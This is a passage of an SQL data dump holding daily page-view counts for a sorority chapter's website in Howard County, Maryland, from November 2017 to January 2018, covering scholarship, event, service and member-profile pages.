wc-ajax=get_refreshed_fragments','2017-11-27',16,6),('/history/','2017-11-27',7,190),('/index.php?testwork=ololo','2017-11-27',1,6),('/?testwork=ololo','2017-11-27',1,6),('/','2017-11-28',64,6),('/scholarship/soror-conway1/','2017-11-28',1,1179),('/membership/','2017-11-28',1,576),('/service/zen/','2017-11-28',1,786),('/lgz-celebrates-35-years-service-howard-county-md','2017-11-28',1,956),('/event/hcc-career-links-free-store','2017-11-28',1,1239),('/scholarship/recommendation','2017-11-28',1,1170),('/scholarship','2017-11-28',2,797),('/event/nuts-bolts-understanding-college-financial-aid','2017-11-28',1,1234),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-28',1,956),('/scholarship/recommendation/','2017-11-28',2,1170),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-28',1,1234),('/event/hcc-career-links-free-store/','2017-11-28',1,1239),('/scholarship/','2017-11-28',9,797),('/?wc-ajax=get_refreshed_fragments','2017-11-28',9,6),('/scholarship/application/','2017-11-28',3,804),('/history/','2017-11-28',2,190),('/','2017-11-29',75,6),('/event/nuts-bolts-understanding-college-financial-aid','2017-11-29',7,1234),('/event/hcc-career-links-free-store','2017-11-29',6,1239),('/scholarship/recommendation','2017-11-29',6,1170),('/lgz-celebrates-35-years-service-howard-county-md','2017-11-29',6,956),('/scholarship','2017-11-29',5,797),('/event/hcc-career-links-free-store/','2017-11-29',6,1239),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-29',6,1234),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-29',6,956),('/scholarship/recommendation/','2017-11-29',8,1170),('/scholarship/','2017-11-29',9,797),('/history/','2017-11-29',2,190),('/scholarship/application/','2017-11-29',3,804),('/service/','2017-11-29',2,247),('/service/appa/','2017-11-29',2,781),('/ts_teams/josephine-gross/','2017-11-29',2,1232),('/ts_teams/oretta-timmons/','2017-11-29',2,1230),('/ts_teams/yasmine-allen/','2017-11-29',2,1228),('/ts_teams/jelani-dula/','2017-11-29',2,1226),('/ts_teams/christopher-flowers/','2017-11-29',2,1224),('/ts_teams/journey-mcmillan/','2017-11-29',2,1222),('/ts_teams/nicholas-claud/','2017-11-29',2,1220),('/?wc-ajax=get_refreshed_fragments','2017-11-29',1,6),('/','2017-11-30',91,6),('/scholarship','2017-11-30',5,797),('/scholarship/','2017-11-30',6,797),('/?wc-ajax=get_refreshed_fragments','2017-11-30',11,6),('/event/5th-annual-denim-pearlz-party/','2017-11-30',1,1249),('/scholarship/application/','2017-11-30',3,804),('/scholarship/recommendation/','2017-11-30',1,1170),('/history/','2017-11-30',3,190),('/','2017-12-01',120,6),('/service/','2017-12-01',3,247),('/history/','2017-12-01',6,190),('/scholarship/','2017-12-01',5,797),('/scholarship/application/','2017-12-01',3,804),('/scholarship/recommendation/','2017-12-01',3,1170),('/service/appa/','2017-12-01',4,781),('/service/breakfastonthego/','2017-12-01',2,772),('/service/youth/','2017-12-01',3,738),('/service/zen/','2017-12-01',3,786),('/scholarship/recommendation','2017-12-01',1,1170),('/scholarship','2017-12-01',1,797),('/event/nuts-bolts-understanding-college-financial-aid','2017-12-01',1,1234),('/lgz-celebrates-35-years-service-howard-county-md','2017-12-01',1,956),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-01',1,1234),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-01',1,956),('/event/hcc-career-links-free-store','2017-12-01',1,1239),('/event/hcc-career-links-free-store/','2017-12-01',4,1239),('/ts_teams/cassandra-dorsey/','2017-12-01',2,880),('/ts_teams/kathy-ball/','2017-12-01',1,887),('/?wc-ajax=get_refreshed_fragments','2017-12-01',11,6),('/event/linus-blanket-project/','2017-12-01',1,1217),('/','2017-12-02',236,6),('/scholarship','2017-12-02',1,797),('/scholarship/','2017-12-02',3,797),('/?wc-ajax=get_refreshed_fragments','2017-12-02',5,6),('/scholarship/application/','2017-12-02',3,804),('/ts_teams/helen-newman/','2017-12-02',1,868),('/scholarship/lgzscholarshipreleaseform/','2017-12-02',3,1173),('/scholarship/recommendation/','2017-12-02',1,1170),('/','2017-12-03',109,6),('/history/','2017-12-03',2,190),('/?wc-ajax=get_refreshed_fragments','2017-12-03',17,6),('/scholarship','2017-12-03',1,797),('/scholarship/','2017-12-03',10,797),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-12-03',1,689),('/service/zen/','2017-12-03',2,786),('/membership/','2017-12-03',4,576),('/scholarship/application/','2017-12-03',5,804),('/scholarship/lgzscholarshipreleaseform/','2017-12-03',4,1173),('/scholarship/recommendation/','2017-12-03',1,1170),('/service/','2017-12-03',1,247),('/service/appa/','2017-12-03',1,781),('/service/breakfastonthego/','2017-12-03',1,772),('/service/youth/','2017-12-03',1,738),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-03',1,1234),('/event/5th-annual-denim-pearlz-party/','2017-12-03',1,1249),('/lgz-launches-new-college-preparation-workshops/','2017-12-03',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-03',1,956),('/scholarship/soror-conway1/','2017-12-03',1,1179),('/ts_teams/josephine-gross/','2017-12-03',1,1232),('/ts_teams/oretta-timmons/','2017-12-03',1,1230),('/ts_teams/yasmine-allen/','2017-12-03',1,1228),('/ts_teams/jelani-dula/','2017-12-03',1,1226),('/ts_teams/christopher-flowers/','2017-12-03',1,1224),('/ts_teams/journey-mcmillan/','2017-12-03',1,1222),('/ts_teams/nicholas-claud/','2017-12-03',1,1220),('/','2017-12-04',134,6),('/membership/','2017-12-04',2,576),('/?wc-ajax=get_refreshed_fragments','2017-12-04',10,6),('/history/','2017-12-04',3,190),('/scholarship','2017-12-04',1,797),('/scholarship/','2017-12-04',4,797),('/service/','2017-12-04',4,247),('/scholarship/application/','2017-12-04',8,804),('/scholarship/recommendation/','2017-12-04',1,1170),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-12-04',1,689),('/service/zen/','2017-12-04',1,786),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-04',1,1234),('/','2017-12-05',254,6),('/?wc-ajax=get_refreshed_fragments','2017-12-05',11,6),('/scholarship','2017-12-05',2,797),('/scholarship/','2017-12-05',8,797),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-05',1,1234),('/scholarship/application/','2017-12-05',4,804),('/scholarship/recommendation/','2017-12-05',1,1170),('/history/','2017-12-05',1,190),('/service/','2017-12-05',2,247),('/','2017-12-06',233,6),('/event/5th-annual-denim-pearlz-party','2017-12-06',1,1249),('/scholarship/recommendation','2017-12-06',1,1170),('/lgz-celebrates-35-years-service-howard-county-md','2017-12-06',1,956),('/event/nuts-bolts-understanding-college-financial-aid','2017-12-06',1,1234),('/event/5th-annual-denim-pearlz-party/','2017-12-06',2,1249),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-06',2,1234),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-06',1,956),('/scholarship/recommendation/','2017-12-06',2,1170),('/scholarship','2017-12-06',3,797),('/scholarship/','2017-12-06',7,797),('/scholarship/application/','2017-12-06',6,804),('/history/','2017-12-06',8,190),('/?wc-ajax=get_refreshed_fragments','2017-12-06',34,6),('/service/appa/','2017-12-06',1,781),('/ts_teams/oretta-timmons/','2017-12-06',1,1230),('/ts_teams/josephine-gross/','2017-12-06',1,1232),('/ts_teams/jelani-dula/','2017-12-06',1,1226),('/ts_teams/christopher-flowers/','2017-12-06',1,1224),('/scholarship/soror-conway1/','2017-12-06',1,1179),('/service','2017-12-06',3,247),('/service/','2017-12-06',6,247),('/','2017-12-07',135,6),('/history/','2017-12-07',4,190),('/?wc-ajax=get_refreshed_fragments','2017-12-07',14,6),('/scholarship/application','2017-12-07',2,804),('/scholarship/application/','2017-12-07',4,804),('/event/5th-annual-denim-pearlz-party/','2017-12-07',1,1249),('/service/zen/','2017-12-07',4,786),('/','2017-12-08',107,6),('/?wc-ajax=get_refreshed_fragments','2017-12-08',7,6),('/history/','2017-12-08',6,190),('/scholarship/','2017-12-08',2,797),('/service/zen/','2017-12-08',2,786),('/event/5th-annual-denim-pearlz-party/','2017-12-08',2,1249),('/scholarship/application/','2017-12-08',1,804),('/scholarship/recommendation/','2017-12-08',1,1170),('/scholarship','2017-12-08',1,797),('/','2017-12-09',49,6),('/?wc-ajax=get_refreshed_fragments','2017-12-09',14,6),('/scholarship/application/','2017-12-09',6,804),('/service/zen/','2017-12-09',6,786),('/history/','2017-12-09',2,190),('/service/breakfastonthego/','2017-12-09',5,772),('/scholarship/application','2017-12-09',1,804),('/service/','2017-12-09',6,247),('/index.php?option=com_myblog&task=ajaxupload','2017-12-09',1,6),('/index.php?option=com_adsmanager&task=upload&tmpl=component','2017-12-09',1,6),('/scholarship/recommendation/','2017-12-09',2,1170),('/service/youth/','2017-12-09',2,738),('/service/appa/','2017-12-09',2,781),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-09',1,1234),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-09',1,956),('/','2017-12-10',80,6),('/scholarship','2017-12-10',2,797),('/scholarship/','2017-12-10',4,797),('/scholarship/recommendation','2017-12-10',1,1170),('/event/5th-annual-denim-pearlz-party','2017-12-10',1,1249),('/lgz-celebrates-35-years-service-howard-county-md','2017-12-10',1,956),('/event/nuts-bolts-understanding-college-financial-aid','2017-12-10',1,1234),('/scholarship/recommendation/','2017-12-10',1,1170),('/event/5th-annual-denim-pearlz-party/','2017-12-10',1,1249),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-10',1,956),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-10',1,1234),('/','2017-12-11',244,6),('/scholarship','2017-12-11',1,797),('/scholarship/','2017-12-11',2,797),('/service/','2017-12-11',2,247),('/?wc-ajax=get_refreshed_fragments','2017-12-11',31,6),('/service/zen/','2017-12-11',1,786),('/scholarship/application/','2017-12-11',1,804),('/service/appa','2017-12-11',1,781),('/service/appa/','2017-12-11',1,781),('/event/nuts-bolts-understanding-college-financial-aid','2017-12-11',1,1234),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-11',1,1234),('/event/5th-annual-denim-pearlz-party/','2017-12-11',2,1249),('/history/','2017-12-11',2,190),('/','2017-12-12',281,6),('/?wc-ajax=get_refreshed_fragments','2017-12-12',24,6),('/history/','2017-12-12',1,190),('/ts_teams/kalima-alawode/','2017-12-12',2,888),('/scholarship/application/','2017-12-12',3,804),('/scholarship/','2017-12-12',2,797),('/service','2017-12-12',1,247),('/service/','2017-12-12',1,247),('/service/appa','2017-12-12',1,781),('/service/appa/','2017-12-12',3,781),('/event/nuts-bolts-understanding-college-financial-aid','2017-12-12',1,1234),('/event/nuts-bolts-understanding-college-financial-aid/','2017-12-12',1,1234),('/','2017-12-13',297,6),('/?wc-ajax=get_refreshed_fragments','2017-12-13',13,6),('/scholarship/application/','2017-12-13',6,804),('/lostpassword/','2017-12-13',1,660),('/membership/','2017-12-13',3,576),('/scholarship/','2017-12-13',4,797),('/scholarship','2017-12-13',1,797),('/history/','2017-12-13',1,190),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-12-13',3,689),('/ts_teams/rose-matthews/','2017-12-13',1,870),('/','2017-12-14',292,6),('/?wc-ajax=get_refreshed_fragments','2017-12-14',15,6),('/scholarship/application/','2017-12-14',5,804),('/scholarship/','2017-12-14',7,797),('/scholarship/recommendation/','2017-12-14',2,1170),('/scholarship','2017-12-14',1,797),('/service/breakfastonthego/','2017-12-14',1,772),('/history/','2017-12-14',1,190),('/','2017-12-15',320,6),('/scholarship','2017-12-15',1,797),('/scholarship/','2017-12-15',4,797),('/scholarship/recommendation/','2017-12-15',1,1170),('/?wc-ajax=get_refreshed_fragments','2017-12-15',4,6),('/service/','2017-12-15',1,247),('/ts_teams/ava-lawson/','2017-12-15',1,872),('/scholarship/application/','2017-12-15',1,804),('/history/','2017-12-15',2,190),('/service/appa/','2017-12-15',1,781),('/ts_teams/nathalia-drew/','2017-12-15',1,1084),('/ts_teams/w-ruth-conway/','2017-12-15',2,881),('/service/breakfastonthego/','2017-12-15',2,772),('/','2017-12-16',531,6),('/?wc-ajax=get_refreshed_fragments','2017-12-16',8,6),('/history/','2017-12-16',2,190),('/service/appa/','2017-12-16',3,781),('/service/breakfastonthego/','2017-12-16',2,772),('/service/youth/','2017-12-16',2,738),('/service/zen/','2017-12-16',2,786),('/event/5th-annual-denim-pearlz-party/','2017-12-16',2,1249),('/scholarship/application/','2017-12-16',2,804),('/scholarship/','2017-12-16',1,797),('/scholarship/recommendation/','2017-12-16',1,1170),('/service/','2017-12-16',1,247),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-16',1,1258),('/event/breakfast-on-the-go/','2017-12-16',1,493),('/lgz-launches-new-college-preparation-workshops/','2017-12-16',1,1243),('/event/a-pretty-polished-affair/','2017-12-16',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-16',1,956),('/','2017-12-17',329,6),('/scholarship','2017-12-17',2,797),('/scholarship/','2017-12-17',5,797),('/?wc-ajax=get_refreshed_fragments','2017-12-17',6,6),('/event/5th-annual-denim-pearlz-party/','2017-12-17',2,1249),('/service/youth/','2017-12-17',1,738),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2017-12-17',1,1258),('/scholarship/recommendation','2017-12-17',1,1170),('/event/5th-annual-denim-pearlz-party','2017-12-17',1,1249),('/lgz-celebrates-35-years-service-howard-county-md','2017-12-17',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-17',1,1258),('/scholarship/recommendation/','2017-12-17',1,1170),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-17',1,956),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-12-17',1,689),('/ts_teams/crystal-whitaker/','2017-12-17',2,816),('/service/appa/','2017-12-17',1,781),('/scholarship/application/','2017-12-17',2,804),('/','2017-12-18',330,6),('/history/','2017-12-18',6,190),('/scholarship/','2017-12-18',5,797),('/scholarship/application/','2017-12-18',4,804),('/scholarship/recommendation/','2017-12-18',2,1170),('/service/','2017-12-18',1,247),('/service/appa/','2017-12-18',2,781),('/service/breakfastonthego/','2017-12-18',1,772),('/service/youth/','2017-12-18',6,738),('/service/zen/','2017-12-18',2,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-18',1,1258),('/event/5th-annual-denim-pearlz-party/','2017-12-18',1,1249),('/event/breakfast-on-the-go/','2017-12-18',1,493),('/event/a-pretty-polished-affair/','2017-12-18',1,485),('/lgz-launches-new-college-preparation-workshops/','2017-12-18',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-18',2,956),('/scholarship/soror-conway1/','2017-12-18',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-12-18',1,1173),('/ts_teams/josephine-gross/','2017-12-18',1,1232),('/ts_teams/oretta-timmons/','2017-12-18',1,1230),('/ts_teams/yasmine-allen/','2017-12-18',1,1228),('/ts_teams/jelani-dula/','2017-12-18',1,1226),('/ts_teams/christopher-flowers/','2017-12-18',1,1224),('/ts_teams/journey-mcmillan/','2017-12-18',1,1222),('/ts_teams/nicholas-claud/','2017-12-18',1,1220),('/?wc-ajax=get_refreshed_fragments','2017-12-18',17,6),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-12-18',6,689),('/ts_teams/nathalia-drew/','2017-12-18',1,1084),('/ts_teams/ava-lawson/','2017-12-18',1,872),('/ts_teams/w-ruth-conway/','2017-12-18',1,881),('/','2017-12-19',526,6),('/scholarship','2017-12-19',3,797),('/event/5th-annual-denim-pearlz-party','2017-12-19',1,1249),('/scholarship/','2017-12-19',4,797),('/event/5th-annual-denim-pearlz-party/','2017-12-19',1,1249),('/lgz-celebrates-35-years-service-howard-county-md','2017-12-19',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2017-12-19',1,1258),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-19',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-19',1,1258),('/scholarship/recommendation','2017-12-19',1,1170),('/scholarship/recommendation/','2017-12-19',1,1170),('/service/appa/','2017-12-19',1,781),('/?wc-ajax=get_refreshed_fragments','2017-12-19',12,6),('/history/','2017-12-19',3,190),('/service/breakfastonthego/','2017-12-19',1,772),('/scholarship/application/','2017-12-19',1,804),('/','2017-12-20',228,6),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2017-12-20',3,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-20',3,1258),('/service/appa','2017-12-20',4,781),('/service/appa/','2017-12-20',3,781),('/event/breakfast-on-the-go','2017-12-20',3,493),('/event/breakfast-on-the-go/','2017-12-20',3,493),('/?wc-ajax=get_refreshed_fragments','2017-12-20',29,6),('/service/zen/','2017-12-20',1,786),('/scholarship','2017-12-20',10,797),('/scholarship/','2017-12-20',15,797),('/scholarship/application/','2017-12-20',7,804),('/scholarship/recommendation/','2017-12-20',1,1170),('/service/','2017-12-20',1,247),('/history/','2017-12-20',1,190),('/service/breakfastonthego/','2017-12-20',1,772),('/','2017-12-21',313,6),('/membership/','2017-12-21',1,576),('/history/','2017-12-21',2,190),('/scholarship/application/','2017-12-21',4,804),('/scholarship/recommendation/','2017-12-21',3,1170),('/scholarship/','2017-12-21',4,797),('/service/','2017-12-21',2,247),('/service/youth/','2017-12-21',2,738),('/service/appa/','2017-12-21',2,781),('/service/breakfastonthego/','2017-12-21',3,772),('/service/zen/','2017-12-21',2,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-21',2,1258),('/event/breakfast-on-the-go/','2017-12-21',2,493),('/event/5th-annual-denim-pearlz-party/','2017-12-21',2,1249),('/event/a-pretty-polished-affair/','2017-12-21',2,485),('/lgz-launches-new-college-preparation-workshops/','2017-12-21',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-21',2,956),('/?wc-ajax=get_refreshed_fragments','2017-12-21',6,6),('/scholarship','2017-12-21',1,797),('/','2017-12-22',236,6),('/?wc-ajax=get_refreshed_fragments','2017-12-22',6,6),('/event/breakfast-on-the-go/','2017-12-22',1,493),('/scholarship/application/','2017-12-22',3,804),('/service/breakfastonthego/','2017-12-22',1,772),('/ts_teams/sandra-hudson/','2017-12-22',1,875),('/scholarship','2017-12-22',1,797),('/scholarship/','2017-12-22',2,797),('/','2017-12-23',120,6),('/?wc-ajax=get_refreshed_fragments','2017-12-23',10,6),('/service/zen/','2017-12-23',2,786),('/user/','2017-12-23',1,547),('/scholarship/application/','2017-12-23',2,804),('/service/breakfastonthego/','2017-12-23',2,772),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-12-23',2,689),('/history/','2017-12-23',1,190),('/scholarship/','2017-12-23',1,797),('/service/youth/','2017-12-23',1,738),('/scholarship/recommendation/','2017-12-23',1,1170),('/service/','2017-12-23',1,247),('/service/appa/','2017-12-23',1,781),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-23',1,1258),('/event/5th-annual-denim-pearlz-party/','2017-12-23',1,1249),('/event/breakfast-on-the-go/','2017-12-23',1,493),('/lgz-launches-new-college-preparation-workshops/','2017-12-23',1,1243),('/event/a-pretty-polished-affair/','2017-12-23',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-23',1,956),('/ts_teams/w-ruth-conway/','2017-12-23',1,881),('/','2017-12-24',344,6),('/scholarship','2017-12-24',1,797),('/scholarship/','2017-12-24',2,797),('/?wc-ajax=get_refreshed_fragments','2017-12-24',9,6),('/event/breakfast-on-the-go/','2017-12-24',1,493),('/scholarship/application/','2017-12-24',1,804),('/service/','2017-12-24',1,247),('/history/','2017-12-24',1,190),('/event/5th-annual-denim-pearlz-party/','2017-12-24',2,1249),('/','2017-12-25',345,6),('/history/','2017-12-25',3,190),('/?wc-ajax=get_refreshed_fragments','2017-12-25',16,6),('/ts_teams/kathy-ball/','2017-12-25',1,887),('/membership/','2017-12-25',4,576),('/scholarship/application/','2017-12-25',1,804),('/event/breakfast-on-the-go/','2017-12-25',3,493),('/service/appa/','2017-12-25',3,781),('/ts_teams/josephine-gross/','2017-12-25',1,1232),('/ts_teams/journey-mcmillan/','2017-12-25',1,1222),('/ts_teams/jelani-dula/','2017-12-25',1,1226),('/ts_teams/christopher-flowers/','2017-12-25',1,1224),('/ts_teams/nicholas-claud/','2017-12-25',1,1220),('/ts_teams/yasmine-allen/','2017-12-25',1,1228),('/ts_teams/oretta-timmons/','2017-12-25',1,1230),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2017-12-25',2,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-25',2,1258),('/service/appa','2017-12-25',2,781),('/event/breakfast-on-the-go','2017-12-25',2,493),('/ts_teams/gloria-sanders/','2017-12-25',1,865),('/','2017-12-26',217,6),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2017-12-26',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2017-12-26',4,1258),('/service/appa','2017-12-26',1,781),('/service/appa/','2017-12-26',4,781),('/event/breakfast-on-the-go','2017-12-26',1,493),('/event/breakfast-on-the-go/','2017-12-26',4,493),('/?wc-ajax=get_refreshed_fragments','2017-12-26',30,6),('/index.php','2017-12-26',1,6),('/membership/','2017-12-26',2,576),('/scholarship/application/','2017-12-26',5,804),('/history/','2017-12-26',2,190),('/scholarship/recommendation/','2017-12-26',3,1170),('/scholarship/','2017-12-26',4,797),('/service/','2017-12-26',3,247),('/service/youth/','2017-12-26',2,738),('/service/zen/','2017-12-26',2,786),('/service/breakfastonthego/','2017-12-26',2,772),('/event/a-pretty-polished-affair/','2017-12-26',2,485),('/event/5th-annual-denim-pearlz-party/','2017-12-26',2,1249),('/lgz-launches-new-college-preparation-workshops/','2017-12-26',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2017-12-26',2,956),('/ts_teams/christy-lewis/','2017-12-26',1,818),('/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','2017-12-26',3,804),('/ts_teams/oretta-timmons/','2017-12-26',1,1230),('/ts_teams/journey-mcmillan/','2017-12-26',1,1222),('/ts_teams/josephine-gross/','2017-12-26',1,1232),('/scholarship/lgzscholarshipreleaseform/','2017-12-26',2,1173),('/ts_teams/jelani-dula/','2017-12-26',2,1226),('/ts_teams/nicholas-claud/','2017-12-26',2,1220),('/scholarship/soror-conway1/','2017-12-26',2,1179),('/ts_teams/christopher-flowers/','2017-12-26',2,1224),('/ts_teams/yasmine-allen/','2017-12-26',2,1228),('/scholarship','2017-12-26',2,797),('/','2018-01-07',20,6),('/?wc-ajax=get_refreshed_fragments','2018-01-07',6,6),('/history/','2018-01-07',2,190),('/scholarship/application/','2018-01-07',1,804),('/service/zen/','2018-01-07',1,786),('/service/appa/','2018-01-07',1,781),('/service/breakfastonthego/','2018-01-07',1,772),('/user/','2018-01-07',1,547),('/','2018-01-08',46,6),('/?wc-ajax=get_refreshed_fragments','2018-01-08',11,6),('/scholarship/','2018-01-08',9,797),('/history/15355599_1266335763427202_8553129621538361413_n/','2018-01-08',1,694),('/service/','2018-01-08',2,247),('/history/','2018-01-08',3,190),('/scholarship/application/','2018-01-08',3,804),('/scholarship/recommendation/','2018-01-08',2,1170),('/service/appa/','2018-01-08',2,781),('/service/breakfastonthego/','2018-01-08',2,772),('/service/youth/','2018-01-08',2,738),('/service/zen/','2018-01-08',3,786),('/scholarship','2018-01-08',3,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-08',1,956),('/event/5th-annual-denim-pearlz-party/','2018-01-08',1,1249),('/event/a-pretty-polished-affair/','2018-01-08',1,485),('/event/breakfast-on-the-go/','2018-01-08',1,493),('/lgz-launches-new-college-preparation-workshops/','2018-01-08',1,1243),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-08',1,1258),('/download/constitution-by-laws/','2018-01-08',1,989),('/','2018-01-09',88,6),('/?wc-ajax=get_refreshed_fragments','2018-01-09',11,6),('/service/youth/','2018-01-09',3,738),('/service/zen/','2018-01-09',1,786),('/scholarship/recommendation/','2018-01-09',2,1170),('/scholarship/application/','2018-01-09',5,804),('/scholarship','2018-01-09',1,797),('/scholarship/','2018-01-09',2,797),('/event/5th-annual-denim-pearlz-party/','2018-01-09',1,1249),('/ts_teams/kristin-clark/','2018-01-09',3,883),('/','2018-01-10',44,6),('/?wc-ajax=get_refreshed_fragments','2018-01-10',20,6),('/scholarship/','2018-01-10',4,797),('/event/5th-annual-denim-pearlz-party/','2018-01-10',1,1249),('/event/a-pretty-polished-affair/','2018-01-10',1,485),('/scholarship/recommendation/','2018-01-10',1,1170),('/scholarship/application/','2018-01-10',4,804),('/service/zen/','2018-01-10',2,786),('/history/','2018-01-10',7,190),('/service/appa/','2018-01-10',1,781),('/ts_teams/maya-franklin/','2018-01-10',1,878),('/','2018-01-11',46,6),('/membership/','2018-01-11',1,576),('/?wc-ajax=get_refreshed_fragments','2018-01-11',6,6),('/service/zen/','2018-01-11',1,786),('/scholarship/application/','2018-01-11',2,804),('/scholarship/','2018-01-11',1,797),('/event/5th-annual-denim-pearlz-party/','2018-01-11',5,1249),('/','2018-01-12',43,6),('/history/','2018-01-12',3,190),('/?wc-ajax=get_refreshed_fragments','2018-01-12',6,6),('/scholarship','2018-01-12',2,797),('/scholarship/','2018-01-12',2,797),('/scholarship/application/','2018-01-12',2,804),('/service/zen/','2018-01-12',2,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-12',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-12',1,1258),('/service/appa','2018-01-12',1,781),('/service/appa/','2018-01-12',1,781),('/event/breakfast-on-the-go','2018-01-12',1,493),('/event/breakfast-on-the-go/','2018-01-12',1,493),('/','2018-01-13',30,6),('/?wc-ajax=get_refreshed_fragments','2018-01-13',9,6),('/history/','2018-01-13',2,190),('/scholarship/','2018-01-13',2,797),('/scholarship/application/','2018-01-13',4,804),('/scholarship/recommendation/','2018-01-13',2,1170),('/service/','2018-01-13',2,247),('/service/appa/','2018-01-13',2,781),('/ts_teams/josephine-gross/','2018-01-13',2,1232),('/ts_teams/oretta-timmons/','2018-01-13',2,1230),('/ts_teams/yasmine-allen/','2018-01-13',2,1228),('/ts_teams/jelani-dula/','2018-01-13',2,1226),('/ts_teams/christopher-flowers/','2018-01-13',2,1224),('/ts_teams/journey-mcmillan/','2018-01-13',2,1222),('/ts_teams/nicholas-claud/','2018-01-13',2,1220),('/service/youth/','2018-01-13',1,738),('/event/5th-annual-denim-pearlz-party/','2018-01-13',1,1249),('/service/zen/','2018-01-13',1,786),('/user/','2018-01-13',1,547),('/service/breakfastonthego/','2018-01-13',1,772),('/','2018-01-14',155,6),('/history/','2018-01-14',2,190),('/scholarship/','2018-01-14',3,797),('/?wc-ajax=get_refreshed_fragments','2018-01-14',5,6),('/service/zen/','2018-01-14',1,786),('/','2018-01-15',60,6),('/?wc-ajax=get_refreshed_fragments','2018-01-15',21,6),('/history/','2018-01-15',5,190),('/service/breakfastonthego/','2018-01-15',2,772),('/event/5th-annual-denim-pearlz-party/','2018-01-15',2,1249),('/service/zen/','2018-01-15',1,786),('/scholarship/','2018-01-15',1,797),('/scholarship/recommendation/','2018-01-15',1,1170),('/scholarship/application/','2018-01-15',1,804),('/?wc-ajax=get_refreshed_fragments','2018-01-16',36,6),('/','2018-01-16',90,6),('/history/','2018-01-16',20,190),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-16',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-16',1,1258),('/service/appa','2018-01-16',1,781),('/service/appa/','2018-01-16',1,781),('/event/breakfast-on-the-go','2018-01-16',1,493),('/event/breakfast-on-the-go/','2018-01-16',1,493),('/scholarship/','2018-01-16',4,797),('/scholarship/application/','2018-01-16',3,804),('/service/zen/','2018-01-16',3,786),('/service/youth/','2018-01-16',1,738),('/service/breakfastonthego/','2018-01-16',1,772),('/service/','2018-01-16',1,247),('/event/5th-annual-denim-pearlz-party/','2018-01-16',2,1249),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-16',1,956),('/','2018-01-17',62,6),('/history/','2018-01-17',3,190),('/scholarship/','2018-01-17',5,797),('/scholarship/application/','2018-01-17',13,804),('/scholarship/recommendation/','2018-01-17',5,1170),('/service/','2018-01-17',2,247),('/service/appa/','2018-01-17',3,781),('/service/breakfastonthego/','2018-01-17',3,772),('/service/youth/','2018-01-17',2,738),('/service/zen/','2018-01-17',4,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-17',2,1258),('/event/5th-annual-denim-pearlz-party/','2018-01-17',5,1249),('/event/breakfast-on-the-go/','2018-01-17',2,493),('/event/a-pretty-polished-affair/','2018-01-17',2,485),('/lgz-launches-new-college-preparation-workshops/','2018-01-17',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-17',2,956),('/scholarship/soror-conway1/','2018-01-17',2,1179),('/scholarship/lgzscholarshipreleaseform/','2018-01-17',3,1173),('/ts_teams/josephine-gross/','2018-01-17',2,1232),('/ts_teams/oretta-timmons/','2018-01-17',2,1230),('/ts_teams/yasmine-allen/','2018-01-17',2,1228),('/?wc-ajax=get_refreshed_fragments','2018-01-17',15,6),('/index.php','2018-01-17',1,6),('/scholarship','2018-01-17',1,797),('/scholarship/application/?gf_token=ba784e07751b4fb28c440d50eeeb39de','2018-01-17',3,804),('/membership/','2018-01-17',3,576),('/service/appa/','2018-01-18',6,781),('/service/youth/','2018-01-18',3,738),('/service/zen/','2018-